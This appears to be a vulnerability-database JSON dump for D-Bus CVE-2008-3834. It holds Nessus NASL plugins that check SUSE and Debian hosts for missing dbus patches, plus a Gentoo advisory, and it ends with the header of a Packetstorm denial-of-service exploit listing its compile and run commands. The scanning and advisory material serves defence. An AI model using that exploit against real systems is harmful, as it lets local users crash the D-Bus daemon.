(rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-glib-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-gtk-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-mono-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-python-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-qt3-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-qt3-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-x11-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-glib-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-gtk-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-java-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-mono-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-python-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-qt3-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-qt3-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, 
reference:\"dbus-1-x11-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.29.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T05:57:38", "description": "Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.", "edition": 22, "published": "2011-04-29T00:00:00", "title": "SuSE 11.1 Security Update : dbus (SAT Patch Number 4434)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4352", "CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:dbus-1-x11", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:dbus-1", "p-cpe:/a:novell:suse_linux:11:dbus-1-32bit"], "id": "SUSE_11_DBUS-1-110418.NASL", "href": "https://www.tenable.com/plugins/nessus/53587", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53587);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/25 13:36:42\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\", \"CVE-2010-4352\");\n\n script_name(english:\"SuSE 11.1 Security Update : dbus (SAT Patch Number 4434)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=495804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=595681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=659934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1189.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4352.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4434.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:dbus-1\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:dbus-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:dbus-1-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"dbus-1-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"dbus-1-x11-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, 
cpu:\"x86_64\", reference:\"dbus-1-x11-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"dbus-1-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"dbus-1-x11-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"dbus-1-32bit-1.2.10-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-1.2.10-3.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T06:29:46", "description": "This update fixes a denial of service bug in dbus. (CVE-2008-3834)", "edition": 20, "published": "2008-12-04T00:00:00", "title": "SuSE 10 Security Update : dbus (ZYPP Patch Number 5701)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DBUS-1-5701.NASL", "href": "https://www.tenable.com/plugins/nessus/35034", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35034);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:32\");\n\n script_cve_id(\"CVE-2008-3834\");\n\n script_name(english:\"SuSE 10 Security Update : dbus (ZYPP Patch Number 5701)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This update fixes a denial of service bug in dbus. 
(CVE-2008-3834)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5701.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-devel-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-glib-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, 
reference:\"dbus-1-gtk-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-mono-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-python-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-qt3-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-qt3-devel-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"dbus-1-x11-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-devel-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-glib-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-gtk-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-mono-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-python-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-qt-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-qt3-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-qt3-devel-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dbus-1-x11-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", 
reference:\"dbus-1-qt-32bit-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-devel-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-glib-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-gtk-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-java-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-mono-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-python-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-qt3-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-qt3-devel-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"dbus-1-x11-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.17.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.20.5\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-devel-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-glib-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-gtk-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-java-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-mono-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-python-0.60-33.23\")) 
flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-qt-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-qt3-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-qt3-devel-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dbus-1-x11-0.60-33.23\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.20\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-qt-32bit-4.3.4-0.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T05:51:07", "description": "This update fixes a denial of service bug in dbus. 
(CVE-2008-3834)", "edition": 20, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : dbus-1 (dbus-1-246)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:dbus-1-32bit", "p-cpe:/a:novell:opensuse:dbus-1-x11", "p-cpe:/a:novell:opensuse:dbus-1", "p-cpe:/a:novell:opensuse:dbus-1-devel"], "id": "SUSE_11_0_DBUS-1-081016.NASL", "href": "https://www.tenable.com/plugins/nessus/39947", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dbus-1-246.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39947);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-3834\");\n\n script_name(english:\"openSUSE Security Update : dbus-1 (dbus-1-246)\");\n script_summary(english:\"Check for the dbus-1-246 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This update fixes a denial of service bug in dbus. 
(CVE-2008-3834)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=432901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dbus-1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dbus-1-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif 
(ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dbus-1-1.2.1-15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dbus-1-devel-1.2.1-15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dbus-1-x11-1.2.1-18.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"dbus-1-32bit-1.2.1-15.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-1\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:45:08", "description": "Colin Walters discovered that the dbus_signature_validate function in\ndbus, a simple interprocess messaging system, is prone to a denial of\nservice attack.", "edition": 25, "published": "2008-10-24T00:00:00", "title": "Debian DSA-1658-1 : dbus - programming error", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3834"], "modified": "2008-10-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:dbus"], "id": "DEBIAN_DSA-1658.NASL", "href": "https://www.tenable.com/plugins/nessus/34478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1658. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34478);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3834\");\n script_xref(name:\"DSA\", value:\"1658\");\n\n script_name(english:\"Debian DSA-1658-1 : dbus - programming error\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Colin Walters discovered that the dbus_signature_validate function in\ndbus, a simple interprocess messaging system, is prone to a denial of\nservice attack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=501443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1658\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the dbus package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1.0.2-1+etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"dbus\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dbus-1-doc\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"dbus-1-utils\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbus-1-3\", reference:\"1.0.2-1+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libdbus-1-dev\", reference:\"1.0.2-1+etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "### Background\n\nD-Bus is a daemon providing a framework for applications to communicate with one another. \n\n### Description\n\nschelte reported that the dbus_signature_validate() function can trigger a failed assertion when processing a message containing a malformed signature. \n\n### Impact\n\nA local user could send a specially crafted message to the D-Bus daemon, leading to a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll D-Bus users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/dbus-1.2.3-r1\"", "edition": 1, "modified": "2009-01-11T00:00:00", "published": "2009-01-11T00:00:00", "id": "GLSA-200901-04", "href": "https://security.gentoo.org/glsa/200901-04", "type": "gentoo", "title": "D-Bus: Denial of Service", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:49", "description": "", "published": "2009-01-20T00:00:00", "type": "packetstorm", "title": "D-Bus Daemon Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-20T00:00:00", "id": "PACKETSTORM:74119", "href": "https://packetstormsecurity.com/files/74119/D-Bus-Daemon-Denial-Of-Service.html", "sourceData": "`/* \n* cve-2008-3834.c \n* \n* D-Bus Daemon Denial of Service < 1.2.4 \n* Jon Oberheide <jon@oberheide.org> \n* http://jon.oberheide.org \n* \n* Usage: \n* \n* $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834 \n* $ ./cve-2008-3834 \n* \n* Information: \n* \n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834 \n* \n* The dbus_signature_validate function in the D-bus library (libdbus) \n* before 1.2.4 allows remote attackers to cause a denial of service \n* (application abort) via a message containing a malformed signature, \n* which triggers a failed assertion error. 
